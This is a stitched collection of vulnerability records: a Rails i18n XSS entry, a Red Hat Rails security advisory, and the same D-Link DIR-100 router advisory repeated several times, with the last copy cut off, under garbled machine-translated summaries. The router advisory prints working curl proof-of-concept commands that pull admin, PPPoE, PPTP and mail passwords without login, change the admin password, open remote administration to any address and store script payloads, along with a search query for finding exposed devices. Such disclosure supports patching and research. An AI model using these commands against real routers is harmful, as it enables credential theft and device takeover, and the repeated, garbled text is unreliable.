Cross-site scripting (XSS) vulnerability in actionpack/lib/action_view/helpers/translation_helper.rb in the internationalization component in Ruby on Rails 3.x before 3.2.16 and 4.x before 4.0.2 allows remote attackers to inject arbitrary web script or HTML via a crafted string that triggers generation of a fallback string by the i18n gem. RubyGems i18n is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Versions prior to RubyGems i18n 0.6.6, and 0.5.1 are vulnerable. For the stable distribution (wheezy), these problems have been fixed in version 3.2.6-6+deb7u1. For the unstable distribution (sid), this problem has been fixed in version 3.2.16-3+0 of the rails-3.2 source package. We recommend that you upgrade your ruby-actionpack-3.2 packages. Relevant releases/architectures: OpenStack 3 - noarch 3. An application using a third party library, which uses the Rack::Request interface, or custom Rack middleware could bypass the protection implemented to fix the CVE-2013-0155 vulnerability, causing the application to receive unsafe parameters and become vulnerable to CVE-2013-0155. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Important: Subscription Asset Manager 1.4 security update Advisory ID: RHSA-2014:1863-01 Product: Red Hat Subscription Asset Manager Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1863.html Issue date: 2014-11-17 CVE Names: CVE-2013-1854 CVE-2013-1855 CVE-2013-1857 CVE-2013-4491 CVE-2013-6414 CVE-2013-6415 CVE-2014-0130 ===================================================================== 1. Summary: Updated Subscription Asset Manager 1.4 packages that fix multiple security issues are now available. Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Subscription Asset Manager for RHEL 6 Server - noarch 3. Description: Red Hat Subscription Asset Manager acts as a proxy for handling subscription information and software updates on client machines. Red Hat Subscription Asset Manager is built on Ruby on Rails, a model-view-controller (MVC) framework for web application development. Action Pack implements the controller and the view components. A directory traversal flaw was found in the way Ruby on Rails handled wildcard segments in routes with implicit rendering. A remote attacker could use this flaw to retrieve arbitrary local files accessible to a Ruby on Rails application using the aforementioned routes via a specially crafted request. (CVE-2014-0130) A flaw was found in the way Ruby on Rails handled hashes in certain queries. A remote attacker could use this flaw to perform a denial of service (resource consumption) attack by sending specially crafted queries that would result in the creation of Ruby symbols, which were never garbage collected. (CVE-2013-1854) Two cross-site scripting (XSS) flaws were found in Action Pack. A remote attacker could use these flaws to conduct XSS attacks against users of an application using Action Pack. A remote attacker could possibly use this flaw to perform a reflective cross-site scripting (XSS) attack by providing a specially crafted input to an application using the aforementioned component. (CVE-2013-4491) A denial of service flaw was found in the header handling component of Action View. A remote attacker could send strings in specially crafted headers that would be cached indefinitely, which would result in all available system memory eventually being consumed. (CVE-2013-6414) It was found that the number_to_currency Action View helper did not properly escape the unit parameter. An attacker could use this flaw to perform a cross-site scripting (XSS) attack on an application that uses data submitted by a user in the unit parameter. (CVE-2013-6415) Red Hat would like to thank Ruby on Rails upstream for reporting these issues. Upstream acknowledges Ben Murphy as the original reporter of CVE-2013-1854, Charlie Somerville as the original reporter of CVE-2013-1855, Alan Jenkins as the original reporter of CVE-2013-1857, Peter McLarnan as the original reporter of CVE-2013-4491, Toby Hsieh as the original reporter of CVE-2013-6414, and Ankit Gupta as the original reporter of CVE-2013-6415. All Subscription Asset Manager users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 921329 - CVE-2013-1854 rubygem-activerecord: attribute_dos Symbol DoS vulnerability 921331 - CVE-2013-1855 rubygem-actionpack: css_sanitization: XSS vulnerability in sanitize_css 921335 - CVE-2013-1857 rubygem-actionpack: sanitize_protocol: XSS Vulnerability in the helper of Ruby on Rails 1036483 - CVE-2013-6414 rubygem-actionpack: Action View DoS 1036910 - CVE-2013-6415 rubygem-actionpack: number_to_currency XSS 1036922 - CVE-2013-4491 rubygem-actionpack: i18n missing translation XSS 1095105 - CVE-2014-0130 rubygem-actionpack: directory traversal issue 6. Package List: Red Hat Subscription Asset Manager for RHEL 6 Server: Source: katello-1.4.3.28-1.el6sam_splice.src.rpm ruby193-rubygem-actionmailer-3.2.17-1.el6sam.src.rpm ruby193-rubygem-actionpack-3.2.17-6.el6sam.src.rpm ruby193-rubygem-activemodel-3.2.17-1.el6sam.src.rpm ruby193-rubygem-activerecord-3.2.17-5.el6sam.src.rpm ruby193-rubygem-activeresource-3.2.17-1.el6sam.src.rpm ruby193-rubygem-activesupport-3.2.17-2.el6sam.src.rpm ruby193-rubygem-i18n-0.6.9-1.el6sam.src.rpm ruby193-rubygem-mail-2.5.4-1.el6sam.src.rpm ruby193-rubygem-rack-1.4.5-3.el6sam.src.rpm ruby193-rubygem-rails-3.2.17-1.el6sam.src.rpm ruby193-rubygem-railties-3.2.17-1.el6sam.src.rpm noarch: katello-common-1.4.3.28-1.el6sam_splice.noarch.rpm katello-glue-candlepin-1.4.3.28-1.el6sam_splice.noarch.rpm katello-glue-elasticsearch-1.4.3.28-1.el6sam_splice.noarch.rpm katello-headpin-1.4.3.28-1.el6sam_splice.noarch.rpm katello-headpin-all-1.4.3.28-1.el6sam_splice.noarch.rpm ruby193-rubygem-actionmailer-3.2.17-1.el6sam.noarch.rpm ruby193-rubygem-actionpack-3.2.17-6.el6sam.noarch.rpm ruby193-rubygem-activemodel-3.2.17-1.el6sam.noarch.rpm ruby193-rubygem-activerecord-3.2.17-5.el6sam.noarch.rpm ruby193-rubygem-activeresource-3.2.17-1.el6sam.noarch.rpm ruby193-rubygem-activesupport-3.2.17-2.el6sam.noarch.rpm ruby193-rubygem-i18n-0.6.9-1.el6sam.noarch.rpm ruby193-rubygem-mail-2.5.4-1.el6sam.noarch.rpm ruby193-rubygem-rack-1.4.5-3.el6sam.noarch.rpm ruby193-rubygem-rails-3.2.17-1.el6sam.noarch.rpm ruby193-rubygem-railties-3.2.17-1.el6sam.noarch.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2013-1854 https://access.redhat.com/security/cve/CVE-2013-1855 https://access.redhat.com/security/cve/CVE-2013-1857 https://access.redhat.com/security/cve/CVE-2013-4491 https://access.redhat.com/security/cve/CVE-2013-6414 https://access.redhat.com/security/cve/CVE-2013-6415 https://access.redhat.com/security/cve/CVE-2014-0130 https://access.redhat.com/security/updates/classification/#important 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFUai7iXlSAg2UNWIIRAmtEAJ9m+ZUXuva81fLz9G1CLKYi5aJoHACfcd3y SoVal0zNgx0pwtSAkS1q5/0= =i5aK -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

D-Link DIR-100 Contains a cross-site request forgery vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. D-Link DIR-100 Ethernet Broadband Router has a cross-site request forgery vulnerability that allows remote attackers to build malicious URIs, entice users to resolve, and perform malicious operations in the target user context, such as changing administrator passwords. D-Link DIR-100 is prone to the following security vulnerabilities: 1. An authentication-bypass vulnerability 2. Multiple information-disclosure vulnerabilities 3. A cross-site request-forgery vulnerability 4. A cross-site scripting vulnerability An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. * Title: Router D-Link DIR-100 Multiple Vulnerabilities * Date: 2013-12-18 * Author: Felix Richter * Contact: root@euer.krebsco.de * Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip * Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip * Report Version: 2.0 * Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt * Vulnerable: D-Link DIR-100 * Hardware Revision: D1 * Software Version: 4.03B07 (from 2012-04-10) * CVE Numbers: * CWE-287 Authentication Issues: CVE-2013-7051 * CWE-255 Issues with Credential Management: CVE-2013-7052 * CWE-352 Cross-Site Request Forgery: CVE-2013-7053 * CWE-79 Cross-Site Scripting: CVE-2013-7054 * CWE-200 Information Disclosure: CVE-2013-7055 * Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1 * State: Patched by Vendor * Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8 # Table of Contents 1. Background 2. Technical Description 4. Severity and Remediation 5. Timeline # 1. Background The DIR-100 is designed for easy and robust connectivity among heterogeneous standards-based network devices. Computers can communicate directly with this router for automatic opening and closing of UDP/TCP ports to take full advantage of the security provided without sacrificing functionality of on-line applications. # 2 Vulnerability Description Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet Broadband Router Revision D (and potentially other devices sharing the affected firmware) that could allow a remote attacker: - Retrieve the Administrator password without authentication leading to authentication bypass [CWE-255] - Retrieve sensitive configuration paramters like the pppoe username and password without authentication [CWE-200] - Execute privileged Commands without authentication through a race condition leading to weak authentication enforcement [CWE-287] - Sending formatted request to a victim which then will execute arbitrary commands on the device (CSRF) [CWE-352] - Store arbitrary javascript code which will be executed when a victim accesses the administrator interface [CWE-79] CVE-Numbers for these vulnerabilities has not yet been assigned. # 3 Technical Description of the Vulnerabilities ## 3.0 The DIR-100 Web Interface and CGI The DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for unauthenticated users and `/cli.cgi` for authenticated requests. list of features provided by each cgi-script can be retrieved by: curl 'http://192.168.1.104/cliget.cgi?cmd=help' # and respectively when authenticated curl 'http://192.168.1.104/cli.cgi?cmd=help' ## 3.1 Authentication Bypass ### Description The administrator password is not protected in any way on the device, every attacker with access to the administrator interface which listens on port 80. For retrieving the Administrator password the request must not be authenticated. ### Proof of Concept The web interface provides two distinct ways to retrieve the adminstrator password: curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1' curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary' ## 3.2 Weak Authentication ### Description As soon as a user is logged into the administration interface, the cli CGI is `unlocked` and can be used by without authenticating before as the cgi-script does not check any other authentication parameters such as cookies or HTTP Parameters. The only access check is if the IP-Address is the same. ### Proof of Concept # open the router interface in a web browser and log in firefox 'http://192.168.0.1/' # open a new terminal or another web-browser which is currently not logged # in and try to access curl 'http://192.168.0.1/cli.cgi?cmd=help' # this request will be authenticated and it will not be redirected to the # login page. If no user is logged in, the request will be redirected to # the login ## 3.3 Retrieve sensitive information ### Description Besides retrieving the administrator password without authentication it is possible to retrieve other sensitive configuration from the device as well like the PPTP and poe Username and Password, as well as the configured dyndns username and password and configured mail log credentials when these parameters are configured. No authentication is requred. ### Proof of Concept curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1' curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user' curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass' curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user' curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass' curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user' curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd' ## 3.4 Cross-Site Request Forgery (CSRF) ### Description CSRF attacks can be launched by sending a formatted request to a victim, then tricking the victim into loading the request (often automatically), which makes it appear that the request came from the victim. As an example the attacker could change the administrator password (see Proof of Concept code) and enable system remote access. ### Proof of Concept Changing the password for administrator can be done when the ip-address is authenticated: # Log into DIR-100 curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm' # Change password curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit' # enable remote console curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit' ## 3.5 Cross-Site Scripting (XSS) ### Description It is possible for an authenticated user to store information on the server which will not be checked on the server side for special characters which results in persistent Cross-Site Scripting Vulnerabilities. With this vulnerabilty the victim (administrator) will run javascript code in the context of the D-Link DIR-100. XSS is possible because only on the client side (javascript code) the input is filtered and validated, sending data directly to the CGI scripts. ### Proof of Concept # Log into DIR-100 curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm' # XSS in Static IP Address Tab curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=' # XSS in Scheduler tab curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit' # 4 Severity and Remediation This exploits are considered very critical, especially when the feature of remote administration is activated on the system. Weak authentication, together with cross-site request forgery and authentication bypass can result in a full device compromise from an arbitrary website the victim is accessing, even if the device has remote administration deactivated on the internet-port. It is recommended to upgrade the router with the newest firmware of the D-Link DIR-100. # 5 Timeline 2013-09-13 - First Contact with D-Link Support 2013-09-19 - Sent Report 2013-10-14 - Request Status update, Response: Beta will be available mid October 2013-12-02 - Vendor publishes Firmware Update 2013-12-11 - Request CVE-IDs 2013-12-18 - Publish the report

D-Link DIR-100 4.03B07: security bypass via an error in the cliget.cgi script. D-Link DIR-100 Contains a vulnerability related to insufficient protection of credentials.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. When a user logs in to the D-Link DIR-100 Ethernet Broadband Router management interface, the access to the cliget.cgi is not correctly restricted. The submitted request is only checked whether the IP addresses are the same, and the attacker is not authorized to access. For example, the management password information is obtained. D-Link DIR-100 is prone to the following security vulnerabilities: 1. An authentication-bypass vulnerability 2. Multiple information-disclosure vulnerabilities 3. A cross-site request-forgery vulnerability 4. A cross-site scripting vulnerability An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. * Title: Router D-Link DIR-100 Multiple Vulnerabilities * Date: 2013-12-18 * Author: Felix Richter * Contact: root@euer.krebsco.de * Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip * Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip * Report Version: 2.0 * Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt * Vulnerable: D-Link DIR-100 * Hardware Revision: D1 * Software Version: 4.03B07 (from 2012-04-10) * CVE Numbers: * CWE-287 Authentication Issues: CVE-2013-7051 * CWE-255 Issues with Credential Management: CVE-2013-7052 * CWE-352 Cross-Site Request Forgery: CVE-2013-7053 * CWE-79 Cross-Site Scripting: CVE-2013-7054 * CWE-200 Information Disclosure: CVE-2013-7055 * Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1 * State: Patched by Vendor * Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8 # Table of Contents 1. Background 2. Technical Description 4. Severity and Remediation 5. Timeline # 1. Background The DIR-100 is designed for easy and robust connectivity among heterogeneous standards-based network devices. Computers can communicate directly with this router for automatic opening and closing of UDP/TCP ports to take full advantage of the security provided without sacrificing functionality of on-line applications. # 2 Vulnerability Description Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet Broadband Router Revision D (and potentially other devices sharing the affected firmware) that could allow a remote attacker: - Retrieve the Administrator password without authentication leading to authentication bypass [CWE-255] - Retrieve sensitive configuration paramters like the pppoe username and password without authentication [CWE-200] - Execute privileged Commands without authentication through a race condition leading to weak authentication enforcement [CWE-287] - Sending formatted request to a victim which then will execute arbitrary commands on the device (CSRF) [CWE-352] - Store arbitrary javascript code which will be executed when a victim accesses the administrator interface [CWE-79] CVE-Numbers for these vulnerabilities has not yet been assigned. # 3 Technical Description of the Vulnerabilities ## 3.0 The DIR-100 Web Interface and CGI The DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for unauthenticated users and `/cli.cgi` for authenticated requests. list of features provided by each cgi-script can be retrieved by: curl 'http://192.168.1.104/cliget.cgi?cmd=help' # and respectively when authenticated curl 'http://192.168.1.104/cli.cgi?cmd=help' ## 3.1 Authentication Bypass ### Description The administrator password is not protected in any way on the device, every attacker with access to the administrator interface which listens on port 80. For retrieving the Administrator password the request must not be authenticated. ### Proof of Concept The web interface provides two distinct ways to retrieve the adminstrator password: curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1' curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary' ## 3.2 Weak Authentication ### Description As soon as a user is logged into the administration interface, the cli CGI is `unlocked` and can be used by without authenticating before as the cgi-script does not check any other authentication parameters such as cookies or HTTP Parameters. The only access check is if the IP-Address is the same. ### Proof of Concept # open the router interface in a web browser and log in firefox 'http://192.168.0.1/' # open a new terminal or another web-browser which is currently not logged # in and try to access curl 'http://192.168.0.1/cli.cgi?cmd=help' # this request will be authenticated and it will not be redirected to the # login page. If no user is logged in, the request will be redirected to # the login ## 3.3 Retrieve sensitive information ### Description Besides retrieving the administrator password without authentication it is possible to retrieve other sensitive configuration from the device as well like the PPTP and poe Username and Password, as well as the configured dyndns username and password and configured mail log credentials when these parameters are configured. No authentication is requred. ### Proof of Concept curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1' curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user' curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass' curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user' curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass' curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user' curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd' ## 3.4 Cross-Site Request Forgery (CSRF) ### Description CSRF attacks can be launched by sending a formatted request to a victim, then tricking the victim into loading the request (often automatically), which makes it appear that the request came from the victim. As an example the attacker could change the administrator password (see Proof of Concept code) and enable system remote access. ### Proof of Concept Changing the password for administrator can be done when the ip-address is authenticated: # Log into DIR-100 curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm' # Change password curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit' # enable remote console curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit' ## 3.5 Cross-Site Scripting (XSS) ### Description It is possible for an authenticated user to store information on the server which will not be checked on the server side for special characters which results in persistent Cross-Site Scripting Vulnerabilities. With this vulnerabilty the victim (administrator) will run javascript code in the context of the D-Link DIR-100. XSS is possible because only on the client side (javascript code) the input is filtered and validated, sending data directly to the CGI scripts. ### Proof of Concept # Log into DIR-100 curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm' # XSS in Static IP Address Tab curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=' # XSS in Scheduler tab curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit' # 4 Severity and Remediation This exploits are considered very critical, especially when the feature of remote administration is activated on the system. Weak authentication, together with cross-site request forgery and authentication bypass can result in a full device compromise from an arbitrary website the victim is accessing, even if the device has remote administration deactivated on the internet-port. It is recommended to upgrade the router with the newest firmware of the D-Link DIR-100. # 5 Timeline 2013-09-13 - First Contact with D-Link Support 2013-09-19 - Sent Report 2013-10-14 - Request Status update, Response: Beta will be available mid October 2013-12-02 - Vendor publishes Firmware Update 2013-12-11 - Request CVE-IDs 2013-12-18 - Publish the report

D-Link DIR-100 4.03B07: cli.cgi security bypass due to failure to check authentication parameters. D-Link DIR-100 Contains an authentication vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. The D-Link DIR-100 Ethernet Broadband Router failed to perform an authentication mechanism, allowing remote attackers to exploit the vulnerability to submit requests without verifying the execution of privileged commands. D-Link DIR-100 is prone to the following security vulnerabilities: 1. An authentication-bypass vulnerability 2. Multiple information-disclosure vulnerabilities 3. A cross-site request-forgery vulnerability 4. A cross-site scripting vulnerability An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. * Title: Router D-Link DIR-100 Multiple Vulnerabilities * Date: 2013-12-18 * Author: Felix Richter * Contact: root@euer.krebsco.de * Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip * Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip * Report Version: 2.0 * Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt * Vulnerable: D-Link DIR-100 * Hardware Revision: D1 * Software Version: 4.03B07 (from 2012-04-10) * CVE Numbers: * CWE-287 Authentication Issues: CVE-2013-7051 * CWE-255 Issues with Credential Management: CVE-2013-7052 * CWE-352 Cross-Site Request Forgery: CVE-2013-7053 * CWE-79 Cross-Site Scripting: CVE-2013-7054 * CWE-200 Information Disclosure: CVE-2013-7055 * Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1 * State: Patched by Vendor * Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8 # Table of Contents 1. Background 2. Technical Description 4. Severity and Remediation 5. Timeline # 1. Background The DIR-100 is designed for easy and robust connectivity among heterogeneous standards-based network devices. Computers can communicate directly with this router for automatic opening and closing of UDP/TCP ports to take full advantage of the security provided without sacrificing functionality of on-line applications. # 2 Vulnerability Description Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet Broadband Router Revision D (and potentially other devices sharing the affected firmware) that could allow a remote attacker: - Retrieve the Administrator password without authentication leading to authentication bypass [CWE-255] - Retrieve sensitive configuration paramters like the pppoe username and password without authentication [CWE-200] - Execute privileged Commands without authentication through a race condition leading to weak authentication enforcement [CWE-287] - Sending formatted request to a victim which then will execute arbitrary commands on the device (CSRF) [CWE-352] - Store arbitrary javascript code which will be executed when a victim accesses the administrator interface [CWE-79] CVE-Numbers for these vulnerabilities has not yet been assigned. # 3 Technical Description of the Vulnerabilities ## 3.0 The DIR-100 Web Interface and CGI The DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for unauthenticated users and `/cli.cgi` for authenticated requests. list of features provided by each cgi-script can be retrieved by: curl 'http://192.168.1.104/cliget.cgi?cmd=help' # and respectively when authenticated curl 'http://192.168.1.104/cli.cgi?cmd=help' ## 3.1 Authentication Bypass ### Description The administrator password is not protected in any way on the device, every attacker with access to the administrator interface which listens on port 80. For retrieving the Administrator password the request must not be authenticated. ### Proof of Concept The web interface provides two distinct ways to retrieve the adminstrator password: curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1' curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary' ## 3.2 Weak Authentication ### Description As soon as a user is logged into the administration interface, the cli CGI is `unlocked` and can be used by without authenticating before as the cgi-script does not check any other authentication parameters such as cookies or HTTP Parameters. The only access check is if the IP-Address is the same. ### Proof of Concept # open the router interface in a web browser and log in firefox 'http://192.168.0.1/' # open a new terminal or another web-browser which is currently not logged # in and try to access curl 'http://192.168.0.1/cli.cgi?cmd=help' # this request will be authenticated and it will not be redirected to the # login page. If no user is logged in, the request will be redirected to # the login ## 3.3 Retrieve sensitive information ### Description Besides retrieving the administrator password without authentication it is possible to retrieve other sensitive configuration from the device as well like the PPTP and poe Username and Password, as well as the configured dyndns username and password and configured mail log credentials when these parameters are configured. No authentication is requred. ### Proof of Concept curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1' curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user' curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass' curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user' curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass' curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user' curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd' ## 3.4 Cross-Site Request Forgery (CSRF) ### Description CSRF attacks can be launched by sending a formatted request to a victim, then tricking the victim into loading the request (often automatically), which makes it appear that the request came from the victim. As an example the attacker could change the administrator password (see Proof of Concept code) and enable system remote access. ### Proof of Concept Changing the password for administrator can be done when the ip-address is authenticated: # Log into DIR-100 curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm' # Change password curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit' # enable remote console curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit' ## 3.5 Cross-Site Scripting (XSS) ### Description It is possible for an authenticated user to store information on the server which will not be checked on the server side for special characters which results in persistent Cross-Site Scripting Vulnerabilities. With this vulnerabilty the victim (administrator) will run javascript code in the context of the D-Link DIR-100. XSS is possible because only on the client side (javascript code) the input is filtered and validated, sending data directly to the CGI scripts. ### Proof of Concept # Log into DIR-100 curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm' # XSS in Static IP Address Tab curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=' # XSS in Scheduler tab curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit' # 4 Severity and Remediation This exploits are considered very critical, especially when the feature of remote administration is activated on the system. Weak authentication, together with cross-site request forgery and authentication bypass can result in a full device compromise from an arbitrary website the victim is accessing, even if the device has remote administration deactivated on the internet-port. It is recommended to upgrade the router with the newest firmware of the D-Link DIR-100. # 5 Timeline 2013-09-13 - First Contact with D-Link Support 2013-09-19 - Sent Report 2013-10-14 - Request Status update, Response: Beta will be available mid October 2013-12-02 - Vendor publishes Firmware Update 2013-12-11 - Request CVE-IDs 2013-12-18 - Publish the report

D-Link DIR-100 Contains a cross-site scripting vulnerability.The information may be obtained and the information may be altered. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. D-Link DIR-100 Ethernet Broadband Router fails to properly filter the input of static IP address tags or scheduling tags, allowing remote attackers to exploit vulnerabilities to build malicious URIs, entice users to resolve, obtain sensitive cookies, hijack sessions or on the client side. Malicious operation on. D-Link DIR-100 is prone to the following security vulnerabilities: 1. An authentication-bypass vulnerability 2. Multiple information-disclosure vulnerabilities 3. A cross-site request-forgery vulnerability 4. A cross-site scripting vulnerability An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. * Title: Router D-Link DIR-100 Multiple Vulnerabilities * Date: 2013-12-18 * Author: Felix Richter * Contact: root@euer.krebsco.de * Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip * Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip * Report Version: 2.0 * Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt * Vulnerable: D-Link DIR-100 * Hardware Revision: D1 * Software Version: 4.03B07 (from 2012-04-10) * CVE Numbers: * CWE-287 Authentication Issues: CVE-2013-7051 * CWE-255 Issues with Credential Management: CVE-2013-7052 * CWE-352 Cross-Site Request Forgery: CVE-2013-7053 * CWE-79 Cross-Site Scripting: CVE-2013-7054 * CWE-200 Information Disclosure: CVE-2013-7055 * Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1 * State: Patched by Vendor * Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8 # Table of Contents 1. Background 2. Technical Description 4. Severity and Remediation 5. Timeline # 1. Background The DIR-100 is designed for easy and robust connectivity among heterogeneous standards-based network devices. Computers can communicate directly with this router for automatic opening and closing of UDP/TCP ports to take full advantage of the security provided without sacrificing functionality of on-line applications. # 2 Vulnerability Description Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet Broadband Router Revision D (and potentially other devices sharing the affected firmware) that could allow a remote attacker: - Retrieve the Administrator password without authentication leading to authentication bypass [CWE-255] - Retrieve sensitive configuration paramters like the pppoe username and password without authentication [CWE-200] - Execute privileged Commands without authentication through a race condition leading to weak authentication enforcement [CWE-287] - Sending formatted request to a victim which then will execute arbitrary commands on the device (CSRF) [CWE-352] - Store arbitrary javascript code which will be executed when a victim accesses the administrator interface [CWE-79] CVE-Numbers for these vulnerabilities has not yet been assigned. # 3 Technical Description of the Vulnerabilities ## 3.0 The DIR-100 Web Interface and CGI The DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for unauthenticated users and `/cli.cgi` for authenticated requests. list of features provided by 